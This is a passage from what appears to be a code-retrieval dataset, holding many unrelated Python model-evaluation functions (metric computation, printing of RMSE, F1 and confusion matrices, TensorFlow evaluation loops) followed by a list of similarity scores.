| {:5d} : {:5d} : {:4.1f} % : {:5.2f} | | {:5d} : {:5d} : {:4.1f} % : {:5.2f} |\".format(event_label,\n int(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['Nref']),\n int(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['Nsys']),\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['F']*100,\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['ER'],\n int(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['Nref']),\n int(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['Nsys']),\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['F']*100,\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['ER'])\n seg_Nref += int(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['Nref'])\n seg_Nsys += int(overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise'][event_label]['Nsys'])\n\n event_Nref += int(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['Nref'])\n event_Nsys += int(overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise'][event_label]['Nsys'])\n print \" ---------------------+-------+-------+--------+-------+ +-------+-------+--------+-------+\"\n print \" {:20s} | {:5d} : {:5d} : {:14s} | | {:5d} : {:5d} : {:14s} |\".format('Sum',\n seg_Nref,\n seg_Nsys,\n '',\n event_Nref,\n event_Nsys,\n '')\n print \" {:20s} | {:5s} {:5s} : {:4.1f} % : {:5.2f} | | {:5s} {:5s} : {:4.1f} % : {:5.2f} |\".format('Average',\n '', '',\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['F']*100,\n overall_metrics_per_scene[scene_label]['segment_based_metrics']['class_wise_average']['ER'],\n '', '',\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['F']*100,\n overall_metrics_per_scene[scene_label]['event_based_metrics']['class_wise_average']['ER'])\n print \" \"", "def eval(approach, datapath, incremental):\n param_grid = approaches[approach] if not incremental else params[approach]\n report_path = evaluate(datapath,\n approach=approach,\n param_grid=param_grid,\n incremental=incremental)\n c.echo('Report compiled at {0}.'.format(report_path))", "def evaluate(pred, ground_truth, target, count_to_level = False, Y_name = None, thresholds = None, print_metrics=True):\n \n if target == 'count':\n \n # fill NaNs with zeroes\n pred = pred.fillna(method = \"ffill\")\n pred = pred.fillna(method = \"bfill\")\n ground_truth = ground_truth.fillna(method = \"ffill\")\n ground_truth = ground_truth.fillna(method = \"bfill\")\n \n # Set negative predictions to zero\n pred[pred < 0] = 0\n ground_truth[ground_truth < 0] = 0\n \n # Calculate error metrics\n rmse = mean_squared_error(ground_truth, pred, squared=False)\n mae = mean_absolute_error(ground_truth, pred)\n \n # Calculate error metrics only for crowded moments (p75) \n busy = np.percentile(ground_truth, 75)\n ground_truth_busy = ground_truth[ground_truth > busy].dropna()\n pred_busy = pred[ground_truth > busy].dropna()\n rmse_busy = mean_squared_error(ground_truth_busy, pred_busy, squared=False)\n mae_busy = mean_absolute_error(ground_truth_busy, pred_busy)\n \n # Store error metrics in dict\n error_metrics = dict({'rmse': rmse, 'rmse_busy': rmse_busy, 'mae': 
mae, 'mae_busy': mae_busy})\n \n if print_metrics:\n print(f\"Root mean squared error: {rmse.round(1)}\")\n print(f\"Root mean squared error (crowded): {rmse_busy.round(1)}\")\n print(f\"Mean absolute error: {mae.round(1)}\")\n print(f\"Mean absolute error (crowded): {mae_busy.round(1)}\")\n \n if count_to_level:\n pred = get_crowd_levels(pred, Y_name, thresholds)\n ground_truth = get_crowd_levels(ground_truth, Y_name, thresholds)\n \n # Confusion matrix\n conf_mat = confusion_matrix(ground_truth, pred)\n \n error_metrics['conf_mat'] = conf_mat\n \n elif target == \"level\":\n \n # Set dtype to category\n pred = pred.astype('category')\n ground_truth = ground_truth.astype('category')\n \n # Forward fill NaNs\n pred = pred.fillna(method = \"ffill\")\n ground_truth = ground_truth.fillna(method = \"ffill\")\n \n # Confusion matrix\n conf_mat = confusion_matrix(ground_truth, pred)\n \n # Classification report (recall, precision, F1)\n class_report = classification_report(ground_truth, pred, output_dict = True)\n class_report = pd.DataFrame(class_report).transpose()\n \n error_metrics = dict({\"conf_mat\": conf_mat, \"class_report\": class_report})\n \n if print_metrics:\n print(f\"Confusion matrix: {conf_mat}\")\n print(f\"Classification report: {class_report}\")\n \n return error_metrics", "def evaluate(self, X_test, y_test):\n pipeline = run()\n y_pred = pipeline.predict(X_test)\n rmse = compute_rmse(y_pred, y_test)\n print(rmse)\n return rmse", "def evaluator(model, config, test_dir=None):\n shottype = config.shottype\n dataset = config.data_set\n seed = config.seed\n if test_dir is None:\n test_data_gen_dir, _, _ = _generator_dir(\n config=config, target_gen=\"test\", data_dir=None\n )\n if test_dir is not None:\n print(\"Evaluating directory: '{}'.\".format(test_dir))\n test_data_gen_dir, _, _ = _generator_dir(\n config=config, target_gen=\"test\", data_dir=test_dir\n )\n score = model.evaluate_generator(test_data_gen_dir)\n print(\n \"Test metrics: \"\n \"Loss: {:.4f}, \"\n \"Accuracy: {:.4f}, \"\n \"Top 3 accuracy: {:.4f}\".format(score[0], score[1], score[2])\n )\n return score", "def evaluate(self, params):\n model = self.train(params)\n Y_pred = model.predict(self.X_test)\n\n if self.dataset_type == PROBLEM.CLASSIFICATION:\n return {\n 'score': accuracy_score(self.Y_test, Y_pred),\n 'matrix': confusion_matrix(self.Y_test, Y_pred).tolist(),\n 'report': classification_report(self.Y_test, Y_pred,\n target_names=self.labels,\n zero_division=1)\n }\n else:\n return {\n 'max_error': max_error(self.Y_test, Y_pred),\n 'mae': mean_absolute_error(self.Y_test, Y_pred),\n 'mse': mean_squared_error(self.Y_test, Y_pred)\n }", "def run(self):\n logging.info('running experiment...')\n self._prepare()\n self._load_data()\n self._run()\n self._evaluate()\n self._summarise()\n return True", "def run_analyses(y_predict_train, y_train, y_predict, y_test):\n # calculate metrics\n _, training_error = output_error(y_predict_train, y_train)\n (precision, recall, f1, _), testing_error = output_error(y_predict, y_test)\n \n # print out metrics\n print 'Average Precision:', np.average(precision)\n print 'Average Recall:', np.average(recall)\n print 'Average F1:', np.average(f1)\n print 'Training Error:', training_error\n print 'Testing Error:', testing_error", "def print_evaluation(model_name, mae_eval, rmse_eval, r2_eval):\n\n print(model_name, \"rmse (Eval):\", rmse_eval)\n print(model_name, \"mae (Eval):\", mae_eval)\n print(model_name, \"r2 (Eval):\", r2_eval)", "def evaluate(dataset, predictions, 
nms_thresh, recall_metrics=(1,5), iou_metrics=(0.3,0.5,0.7)):\n dataset_name = dataset.__class__.__name__\n logger = logging.getLogger(\"tcn-vmr.inference\")\n logger.info(\"Performing {} evaluation (Size: {}).\".format(dataset_name, len(dataset)))\n \n num_recall_metrics, num_iou_metrics = len(recall_metrics), len(iou_metrics)\n table = [['Rank@{},mIoU@{}'.format(i,j) \\\n for i in recall_metrics for j in iou_metrics]]\n \n recall_metrics = torch.tensor(recall_metrics)\n iou_metrics = torch.tensor(iou_metrics)\n recall_x_iou = torch.zeros(num_recall_metrics, num_iou_metrics)\n\n num_clips = predictions[0].shape[-1]\n\n\n for idx, score2d in tqdm(enumerate(predictions)): \n duration = dataset.get_duration(idx)\n moment = dataset.get_moment(idx) \n\n candidates, scores = score2d_to_moments_scores(score2d, num_clips, duration)\n moments = nms(candidates, scores, topk=recall_metrics[-1], thresh=nms_thresh)\n\n for i, r in enumerate(recall_metrics):\n mious = iou(moments[:r], dataset.get_moment(idx))\n bools = mious[:,None].expand(r, num_iou_metrics) > iou_metrics\n recall_x_iou[i] += bools.any(dim=0)\n\n recall_x_iou /= len(predictions)\n\n table.append(['{:.02f}'.format(recall_x_iou[i][j]*100) \\\n for i in range(num_recall_metrics) for j in range(num_iou_metrics)])\n\n \n table = AsciiTable(table)\n for i in range(num_recall_metrics*num_iou_metrics):\n table.justify_columns[i] = 'center'\n\n logger.info('\\n' + table.table)", "def dependent_error_exp(data, weak_signal_data, num_weak_signal):\n\n w_model = train_weak_signals(data, weak_signal_data, num_weak_signal)\n\n training_data = data['training_data'][0].T\n training_labels = data['training_data'][1]\n val_data, val_labels = data['validation_data']\n val_data = val_data.T\n test_data = data['test_data'][0].T\n test_labels = data['test_data'][1]\n\n num_features, num_data_points = training_data.shape\n\n weak_signal_ub = w_model['error_bounds']\n weak_signal_probabilities = w_model['probabilities']\n weak_test_accuracy = w_model['test_accuracy']\n\n weights = np.zeros(num_features)\n\n print(\"Running tests...\")\n\n optimized_weights, ineq_constraint = train_all(val_data, weights, weak_signal_probabilities, weak_signal_ub, max_iter=5000)\n\n # calculate test probabilities\n test_probabilities = probability(test_data, optimized_weights)\n # calculate test accuracy\n test_accuracy = getModelAccuracy(test_probabilities, test_labels)\n\n print(\"\")\n print(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n print(\"Experiment %d\"%num_weak_signal)\n print(\"We trained %d learnable classifiers with %d weak signals\" %(1, num_weak_signal))\n print(\"The accuracy of the model on the test data is\", test_accuracy)\n print(\"The accuracy of weak signal(s) on the test data is\", weak_test_accuracy)\n print(\"\")\n\n # calculate ge criteria\n print(\"Running tests on ge criteria...\")\n model = ge_criterion_train(val_data.T, val_labels, weak_signal_probabilities, num_weak_signal)\n ge_test_accuracy = accuracy_score(test_labels, np.round(probability(test_data, model)))\n print(\"The accuracy of ge criteria on test data is\", ge_test_accuracy)\n print(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\n # calculate baseline\n print(\"Running tests on the baselines...\")\n baselines = runBaselineTests(val_data, weak_signal_probabilities)\n b_test_accuracy = getWeakSignalAccuracy(test_data, test_labels, baselines)\n 
print(\"The accuracy of the baseline models on test data is\", b_test_accuracy)\n print(\"\")\n\n output = {}\n output['ALL'] = test_accuracy\n output['WS'] = w_model['test_accuracy'][-1]\n output['GE'] = ge_test_accuracy\n output['AVG'] = b_test_accuracy[-1]\n\n return output", "def evaluate(model, test_files):\n print(\"Running predictions.\")\n models = load_model(model)\n predictions = predict(models, test_files)\n\n # # write predictions to file\n # write_predictions(\"evaluate_out.json\",predictions)\n evaluate_individual(predictions, test_files, models)\n evaluate_overall(predictions)", "def print_eval(trainset, testset, exptypes=EXPTYPES, semantic=False, savemodels=False, loadmodels=False, deprep=False, externals=True, predict=True):\n system_pairs = []\n print \"== cleaning lsts ==\"\n cleanupnonespanexpressions(testset)\n cleanholdercandidates(testset)\n cleanholders(testset)\n cleanupnonespanexpressions(trainset)\n cleanholdercandidates(trainset)\n cleanholders(trainset)\n \n print \"== train ==\"\n ev = evaluate()\n features, labels, stats = getfeaturesandlabels(trainset, semantic=semantic, predict=False)\n print counters, '\\n'\n\n print \"== test ==\"\n counters.clear()\n ftest, ltest, stest = getfeaturesandlabels(testset, semantic=semantic, predict=predict)\n print counters\n for exp in exptypes:\n vec, X, y = create_matrix(features[exp], labels[exp])\n if externals:\n vecw, Xw, yw = create_matrix(features[exp + 'w'], labels[exp + 'w'])\n vecimp, Ximp, yimp = create_matrix(features[exp + 'w'], labels[exp + 'implicit'])\n if loadmodels:\n clf = read_model(loadmodels + exp)\n else:\n clf = create_model(X, y)\n if externals:\n clfw = create_model(Xw, yw)\n clfimp = create_model(Ximp, yimp)\n if savemodels:\n write_model(clf, savemodels + exp)\n print \"== eval ==\"\n if deprep:\n print \"== {} ==\".format(deprep)\n Xt, yt = transform_to_matrix(ftest[exp], ltest[exp], vec)\n if externals:\n Xtw, ytw = transform_to_matrix(ftest[exp + 'w'], ltest[exp + 'w'], vecw)\n Xtimp, ytimp = transform_to_matrix(ftest[exp + 'w'], ltest[exp + 'implicit'], vecimp)\n results = clf.predict_proba(Xt)\n s_p_w = False\n s_p_imp = False\n gold_p1 = ev.get_unique_exp(copy.deepcopy(stest['positions'][exp + 'w']), exp, count=False)\n gold_p2 = copy.deepcopy(gold_p1)\n gold_p3 = copy.deepcopy(gold_p1)\n if clfw:\n resultsw = clfw.predict_proba(Xtw)\n s_p_w=ev.get_system_pairs_prob(stest['positions'][exp + 'w'], resultsw, gold_p1)\n counters['s_p_w' + exp] = len(s_p_w)\n if DEBUG:\n print \"RESULTSW\"\n print resultsw\n if clfimp:\n resultsimp = clfimp.predict_proba(Xtimp)\n s_p_imp=ev.get_system_pairs_prob(stest['positions'][exp + 'implicit'], resultsimp, gold_p2)\n counters['s_p_imp' + exp] = len(s_p_imp)\n if DEBUG:\n print \"RESULTSIMP\"\n print resultsimp\n s_p_int=ev.get_system_pairs_prob(stest['positions'][exp], results, gold_p3)\n counters['s_p_int' + exp] = len(s_p_int)\n system_pairs_exp = ev.merge_system_pairs(s_p_int, s_p_imp=s_p_imp, s_p_w=s_p_w)\n counters['system_pairs_all' + exp] = len(system_pairs_exp)\n for pair in system_pairs_exp:\n if 'confidence' in pair and pair['confidence'] > 0:\n counters['system_pairs' + exp] += 1\n if predict:\n ssc_exp = ev.spansetcoverage_o_p(system_pairs_exp, exptype=exp)\n print \"system exp - {}:\\n{}\".format(exp, prf_prettystring(ssc_exp))\n else:\n ssc_exp = ev.spansetcoverage_o_p(system_pairs_exp, exptype=exp)\n print \"gold exp - {}:\\n{}\".format(exp, prf_prettystring(ssc_exp))\n system_pairs.extend(system_pairs_exp)\n if predict:\n ssc = 
ev.spansetcoverage_o_p(system_pairs)\n print \"system exp - all:\\n\", prf_prettystring(ssc)\n else:\n ssc = ev.spansetcoverage_o_p(system_pairs)\n print \"gold exp - all: \\n\", prf_prettystring(ssc)\n \n for k,v in sorted(counters.items(), key=lambda x: x[0]):\n print k, v\n if isinstance(deprep, basestring):\n dump_jsonfile(system_pairs, 'system_pairs-' + deprep + '.json')\n return {'stats': stest, 'system_pairs': system_pairs}", "def _evaluate_loss(self, batch_data, evaluate_settings=None, inference_mode=None):\n\n if not (type(inference_mode) is bool):\n raise TrainerStateInvalidException(\"Inference mode is not set\")\n\n if not inference_mode:\n # @tf.function on the train step level\n return self._call_model(batch_data, evaluate_settings, inference_mode)\n else:\n return self._call_model_tf_func(batch_data, evaluate_settings, tf.constant(inference_mode, dtype=tf.bool))", "def test(self, test_data_path):\n test_data = read_datafile(test_data_path)\n test_data = self.preprocessor.preprocess(test_data)\n self.run(test_data)\n if check_format(self.get_result_path()):\n thresholds, precisions, avg_precision, reciprocal_rank, num_relevant = evaluate(test_data_path,\n self.get_result_path())\n return avg_precision", "def evaluate(input_path, model_path, metrics_path):\n\n logger = logging.getLogger(__name__)\n\n logger.info(\"Loading input dataset\")\n dataset = pd.read_csv(input_path)\n\n X_eval = dataset.drop(\"Survived\", axis=1)\n y_eval = dataset[\"Survived\"]\n\n logger.info(\"Loading model\")\n model = joblib.load(model_path)\n\n logger.info(\"Calculating metrics\")\n scorer = metrics.make_scorer(metrics.mean_squared_error)\n cv_results = cross_validate(model, X=X_eval, y=y_eval, scoring=scorer, cv=5)\n\n metric_values = {\"mse\": cv_results[\"test_score\"].mean()}\n\n logger.info(f\"Writing output to {metrics_path}\")\n with open(metrics_path, \"w\") as file_:\n json.dump(metric_values, file_)", "def evaluate(self, data_collection):\n # map inputs\n mapped_input_dict = self._dict_from_data_collection(self.input_mapping,\n data_collection)\n\n # combine auxiliary inputs with mapped inputs\n all_inputs = mapped_input_dict.copy()\n all_inputs.update(self.auxiliary_inputs)\n\n # evaluate meter\n outputs_dict = self.evaluate_raw(**all_inputs)\n\n # combine auxiliary outputs with raw outputs\n all_outputs = outputs_dict.copy()\n all_outputs.update(self.auxiliary_outputs)\n\n\n # map meter evaluations back to data_collection form\n mapped_output_data_collection = self._data_collection_from_dict(\n self.output_mapping, all_outputs)\n\n # combine with original data, add tags as necessary\n mapped_output_data_collection.add_tags(self.tagspace)\n\n return mapped_output_data_collection", "def run(self):\n self.evaluate()\n self.accumulate()\n self.summarize()", "def evaluate_raw(self):\n message = \"Use the meter.evaluate(data_collection) method for\" \\\n \"YamlDefinedMeters.\"\n raise NotImplementedError(message)", "def evaluate(data_folder):\n seq_length=150\n g = tf.Graph()\n with g.as_default():\n # Load dataset.\n provider = data_provider_kush.get_provider(FLAGS.task)(data_folder)\n num_classes = 6\n audio, ground_truth, num_examples = provider.get_split(FLAGS.portion, FLAGS.batch_size)\n\n # Define model graph.\n with slim.arg_scope([slim.batch_norm],\n is_training=False):\n predictions = models_kush.get_model(FLAGS.model,ground_truth)(audio, num_lstm_modules=FLAGS.num_lstm_modules)\n #pred_argmax = tf.argmax(predictions, 1) \n #lab_argmax = tf.argmax(labels, 1)\n\t\n metrics = {\n 
\"eval/accuracy\": slim.metrics.streaming_mean_squared_error(predictions, ground_truth[:,seq_length-1,:])\n }\n\n total_error = tf.reduce_sum(tf.square(tf.subtract(ground_truth[:,seq_length-1,:], tf.reduce_mean(ground_truth[:,seq_length-1,:]))))\n unexplained_error = tf.reduce_sum(tf.square(tf.subtract(ground_truth[:,seq_length-1,:], predictions)))\n R_squared = tf.subtract(tf.cast(1, tf.float32), tf.divide(total_error, unexplained_error))\n print('R_squared value: ',R_squared)\n for i in range(num_classes):\n name ='eval/mse_{}'.format(i)\n recall = slim.metrics.streaming_mean_squared_error(predictions[:,i],ground_truth[:,seq_length-1,i])\n metrics[name] = recall\n\n metrics['R_squared']=(R_squared,tf.subtract(tf.cast(1, tf.float32), tf.div(total_error, unexplained_error)))\n #print(zip(metrics.values()))\n #metric_names = metrics.keys()\n #value_ops, update_ops = zip(*metrics.values())\n #names_to_values, names_to_updates = dict(zip(metric_names, value_ops)), dict(zip(metric_names, update_ops))\n names_to_values, names_to_updates = slim.metrics.aggregate_metric_map(metrics)\n \n summary_ops = []\n metrics = dict()\n for name, value in names_to_values.items():\n op = tf.summary.scalar(name, value)\n op = tf.Print(op, [value], name)\n summary_ops.append(op)\n metrics[name] = value\n\n # Computing the unweighted average recall and add it into the summaries.\n uar = sum([metrics['eval/mse_{}'.format(i)] for i in range(num_classes)]) / num_classes\n op = tf.summary.scalar('eval/mse', uar)\n op = tf.Print(op, [uar], 'eval/mse')\n summary_ops.append(op)\n\n num_examples = FLAGS.num_examples or num_examples\n num_batches = math.ceil(num_examples / float(FLAGS.batch_size))\n logging.set_verbosity(1)\n\n # Setup the global step.\n slim.get_or_create_global_step()\n\n # How often to run the evaluation.\n eval_interval_secs = FLAGS.eval_interval_secs \n\n slim.evaluation.evaluation_loop(\n '',\n FLAGS.checkpoint_dir,\n FLAGS.log_dir,\n num_evals=num_batches,\n eval_op=list(names_to_updates.values()),\n summary_op=tf.summary.merge(summary_ops),\n eval_interval_secs=eval_interval_secs)", "def evaluate(self, data: dataset.Dataset, batch_size: int = 32) -> Any:\n ds = data.gen_tf_dataset(\n batch_size, is_training=False, preprocess=self._preprocess)\n return self._model.evaluate(ds)", "def evaluate(pred_file, ref_file):\n ref_dict, pred_dict, query_dict, id_dict = build_pred_ref_dict(ref_file, pred_file, ref_file)\n total, acc, scores = res_eval_with_type_acc(query_dict, pred_dict, ref_dict, id_dict, save=False)\n em = calculate_exact_match(pred_dict, ref_dict)\n print('Comp Acc: {:.3f}%\\tBleu-4: {:.3f}\\tRouge-L: {:.3f}'.format(acc, scores['Bleu-4'], scores['Rouge-L']))\n print('EM: {:.3f}%'.format(em))\n # calculate_sketch_type_acc(ref_file, pred_file)\n # calculate_exact_match_for_each_q_type(ref_file, pred_file)\n return total, acc, scores, em", "def validate(self):\n stats = {}\n evaluate_config = {\"verbose\": self.verbose}\n evaluate_config.update(self.config.get(\"evaluate_config\", {}))\n\n results = self.model.evaluate(self.test_dataset, **evaluate_config)\n if results is None:\n # Using local Model since model.evaluate() returns None\n # for MultiWorkerMirroredStrategy\n logger.warning(\"Running a local model to get validation score.\")\n self.local_model = self.model_creator(self.config)\n self.local_model.set_weights(self.model.get_weights())\n results = self.local_model.evaluate(self.test_dataset,\n **evaluate_config)\n\n if isinstance(results, list):\n stats = {\n \"validation_\" + k: 
v\n for k, v in zip(self.model.metrics_names, results)\n }\n else:\n stats = {\"loss\": results}\n\n return stats", "def evaluate(hparams, summary_dir, num_gpus, model_type, eval_set, eval_size,\n eval_shard, data_dir, num_targets, dataset, validate, seed,\n shuffled, shift, pad, batch_size=100, checkpoint=None):\n output_dir = summary_dir\n load_dir = summary_dir + '/train/'\n summary_dir += '/eval/' + FLAGS.dataset + '/' + eval_set\n with tf.Graph().as_default():\n features = get_features(eval_set, batch_size, num_gpus, data_dir,\n num_targets, dataset, validate, evaluate=True,\n seed=seed, shuffled=shuffled, shift=shift,\n pad=pad, eval_shard=eval_shard)\n model = models[model_type](hparams)\n result, _ = model.multi_gpu(features, num_gpus)\n test_writer = tf.summary.FileWriter(summary_dir)\n seen_step = -1\n paused = 0\n while paused < 360:\n print('start evaluation, model defined')\n if checkpoint:\n step = extract_step(checkpoint)\n last_checkpoint = checkpoint\n else:\n step, last_checkpoint = find_checkpoint(load_dir, seen_step)\n if step == -1:\n time.sleep(60)\n paused += 1\n else:\n paused = 0\n seen_step = step\n run_experiment(load_eval, last_checkpoint, test_writer,\n eval_experiment, model, result,\n eval_size // batch_size, features=features,\n eval_set=eval_set, output_dir=output_dir,\n unsupervised=hparams.unsupervised,\n num_gpus=num_gpus)\n if checkpoint:\n break\n\n test_writer.close()", "def _evaluate_fn(model, dataset):\n # Reset the local variables so that the returned metrics are computed using\n # the given data. Similar to the `reset_states` method of `tf.metrics.Metric`.\n for var in model.local_variables:\n if var.initial_value is not None:\n var.assign(var.initial_value)\n else:\n var.assign(tf.zeros_like(var))\n\n def eval_fn(dummy_state, batch):\n \"\"\"Evaluates the model on a batch.\"\"\"\n model.forward_pass(batch, training=False)\n return dummy_state\n\n # Evaluate on the dataset.\n dataset.reduce(initial_state=0, reduce_func=eval_fn)\n\n # Obtain the metrics.\n results = collections.OrderedDict()\n local_outputs = model.report_local_outputs()\n for name, metric in local_outputs.items():\n if isinstance(metric, list) and (len(metric) == 2):\n # Some metrics returned by `report_local_outputs()` can have two scalars:\n # one represents `sum`, and the other represents `count`. 
Ideally, we want\n # to return a single scalar for each metric.\n results[name] = metric[0] / metric[1]\n else:\n results[name] = metric[0] if isinstance(metric, list) else metric\n return results", "def eval_perf_total(model, X_train, y_train, X_test, y_test):\n\n y_hat_train = model.predict(X_train)\n y_hat_test = model.predict(X_test)\n \n train_mae = metrics.mean_absolute_error(y_train, y_hat_train)\n train_mse = metrics.mean_squared_error(y_train, y_hat_train)\n train_rmse = np.sqrt(metrics.mean_squared_error(y_train, y_hat_train))\n train_r = metrics.r2_score(y_train, y_hat_train)\n\n print('Evaluating Performance on Training Data:\\n')\n print(f' Train Mean Absolute Error: {train_mae:,.2f}')\n print(f' Train Mean Squared Error: {train_mse:,.2f}\\n')\n print(f'Train Root Mean Squared Error: {train_rmse:,.2f}')\n print(f'Train R-Square Value: {round(train_r,2)}')\n\n print('\\n'+'---'*25+'\\n')\n\n test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n test_mse = metrics.mean_squared_error(y_test, y_hat_test)\n test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n test_r = metrics.r2_score(y_test, y_hat_test)\n\n print('Evaluating Performance on Testing Data:\\n')\n print(f' Test Mean Absolute Error: {test_mae:,.2f}')\n print(f' Test Mean Squared Error: {test_mse:,.2f}\\n')\n print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n print(f'Test R-Square Value: {round(test_r,2)}')", "def evaluate(\n config,\n _,\n pstate,\n eval_ds,\n rng,\n unused_num_eval_steps = -1,\n):\n logging.info(\"Starting evaluation.\")\n eval_metrics = None\n state = flax_utils.unreplicate(pstate)\n\n render_loop = instant_ngp_utils.make_render_loop(state.params, config)\n with utils.StepTraceContextHelper(\"eval\", 0) as trace_context:\n for step, batch in enumerate(eval_ds): # pytype: disable=wrong-arg-types\n data = jax.tree_map(jnp.asarray, batch)\n render_poses = data[\"c2w\"]\n hwf = data[\"hwf\"]\n rng = jax.random.fold_in(rng, step)\n\n frames = []\n for pose in render_poses:\n frames.append(\n render_loop(instant_ngp_utils.camera_ray_batch(pose, hwf), rng)[0]\n )\n psnrs_test = [\n -10 * jnp.log10(jnp.mean(jnp.square(rgb - gt)))\n for (rgb, gt) in zip(frames, data[\"images\"])\n ]\n psnr_test = np.array(psnrs_test).mean()\n eval_metrics = EvalMetrics.single_from_model_output(psnr=psnr_test)\n trace_context.next_step()\n eval_info = {\n \"out\": jnp.concatenate([x[None, Ellipsis] for x in frames], axis=0),\n \"gtr\": data[\"images\"],\n }\n return eval_metrics, eval_info", "def _evaluate(self, x):\n raise NotImplementedError()", "def __call__(self, test_data, verbose=True):\n\n self.model.eval()\n with torch.no_grad():\n loss, rho, nmse = self._iteration(test_data)\n if verbose:\n print(f'\\n=> Test result: \\nloss: {loss:.3e}'\n f' rho: {rho:.3e} NMSE: {nmse:.3e}\\n')\n return loss, rho, nmse" ]
[ "0.6641769", "0.66378486", "0.62046313", "0.6194362", "0.6182727", "0.61543846", "0.6143863", "0.61434543", "0.6132906", "0.61051583", "0.6086003", "0.60806614", "0.60806614", "0.6062375", "0.60618806", "0.6046971", "0.604346", "0.603338", "0.60103774", "0.60077417", "0.60042995", "0.600045", "0.599409", "0.59850633", "0.59844273", "0.597519", "0.59740853", "0.5954438", "0.59376717", "0.59191453", "0.58973527", "0.58740664", "0.5866037", "0.5865239", "0.58331716", "0.5809086", "0.580573", "0.58054024", "0.57872725", "0.5780027", "0.57743084", "0.5768616", "0.5767731", "0.5764745", "0.5760096", "0.5758343", "0.57427204", "0.57421696", "0.5737063", "0.5736322", "0.57342345", "0.5733124", "0.57322717", "0.57206833", "0.57161224", "0.57148075", "0.57081324", "0.57063794", "0.5699823", "0.56965196", "0.5689107", "0.5684422", "0.5667683", "0.56664205", "0.56570786", "0.5655871", "0.5652238", "0.56500983", "0.5647138", "0.5642938", "0.5637388", "0.56364655", "0.56318176", "0.5630196", "0.5625515", "0.5615498", "0.5615437", "0.5600947", "0.55988467", "0.55903345", "0.5590074", "0.55858266", "0.5583357", "0.5580276", "0.5575671", "0.5571724", "0.55711406", "0.55701953", "0.5563676", "0.5561428", "0.5560663", "0.5557713", "0.5557201", "0.55563456", "0.5550451", "0.5545374", "0.5539956", "0.55391276", "0.5537199", "0.5530665", "0.55126756" ]
0.0
-1
Applies VRT functions to a GDAL-readable inputfile, rendering outputfile. Functions must be an iterable of single-parameter functions that take a filename as input.
def pipeline(inputfile, outputfile, functions, **kwargs):
    if not functions:
        raise ValueError('Must have at least one function')
    tmpfiles = []
    try:
        previous = inputfile
        for name, f in functions:
            logging.debug(name)
            vrt = f(previous)
            current = vrt.get_tempfile(suffix='.vrt', prefix='gdal')
            tmpfiles.append(current)
            previous = current.name
        logging.info('Rendering reprojected image')
        return vrt.render(outputfile=outputfile, **kwargs)
    finally:
        for f in tmpfiles:
            f.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main(fn_input, fn_output):\n # read file\n inter = Interpolator()\n inter.read_file(fn_input)\n inter.write_interpolated(fn_output)", "def merge(files: List[str], output_file: str, resample: str = \"average\") -> None:\n\n build_vrt(constants.TEMP_VRT_FILE, files, resample)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', 'YES')\n\n gdal.Translate(destName=output_file, srcDS=constants.TEMP_VRT_FILE)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', None)\n\n if os.path.isfile(constants.TEMP_VRT_FILE):\n os.remove(constants.TEMP_VRT_FILE)", "def run(self):\n\t\tif not self.is_valid:\n\t\t\traise ValueError('Paths are not valid')\n\t\t\n\t\tfrom manipulators.run import all_functions\n\t\tinput_file = open(self.input_path, 'rb')\n\t\tinput_csv = csv.reader(input_file, delimiter=',')\n\t\toutput_file = open(self.output_path, 'wb')\n\t\toutput_csv = csv.writer(output_file, delimiter=',')\n\t\tall_functions(input_csv, output_csv)", "def build_vrt(vrt: str, files: List[str], resample_name: str) -> None:\n\n options = gdal.BuildVRTOptions(srcNodata=0)\n gdal.BuildVRT(destName=vrt, srcDSOrSrcDSTab=files, options=options)\n add_pixel_fn(vrt, resample_name)", "def run_transform(i_fn, o_fn):\n if not (all(is_bed(fn) for fn in [i_fn, o_fn]) or all(is_vcf(fn) for fn in [i_fn, o_fn])):\n raise ValueError(\"Input and output must be both BED or VCF\")\n with get_reader(i_fn) as reader:\n with get_writer(o_fn, reader.samples) as writer:\n for r in reader:\n writer.writeRecord(transform_coordinate_of_sv(r))", "def convert_vrt(fname, out_fname, dataset_name='dataset',\n compression=H5CompressionFilter.LZF, filter_opts=None,\n attrs=None):\n with h5py.File(out_fname) as fid:\n with rasterio.open(fname) as rds:\n # set default chunks and set dimensions\n if rds.count == 3:\n chunks = (3, 256, 256)\n dims = (3, rds.height, rds.width)\n else:\n chunks = (256, 256)\n dims = (rds.height, rds.width)\n\n # create empty or copy the user supplied filter options\n if not filter_opts:\n filter_opts = dict()\n filter_opts['chunks'] = chunks\n else:\n filter_opts = filter_opts.copy()\n\n\n if 'chunks' not in filter_opts:\n filter_opts['chunks'] = chunks\n\n # modify to have 3D chunks if we have a multiband vrt\n if rds.count == 3 and len(filter_opts['chunks']) != 3:\n # copy the users original 2D chunk and insert the third\n chunks = list(filter_opts['chunks'])\n chunks.insert(0, 3)\n filter_opts['chunks'] = chunks\n\n # dataset attributes\n if attrs:\n attrs = attrs.copy()\n else:\n attrs = {}\n\n attrs['geotransform'] = rds.transform.to_gdal()\n attrs['crs_wkt'] = rds.crs.wkt\n\n # 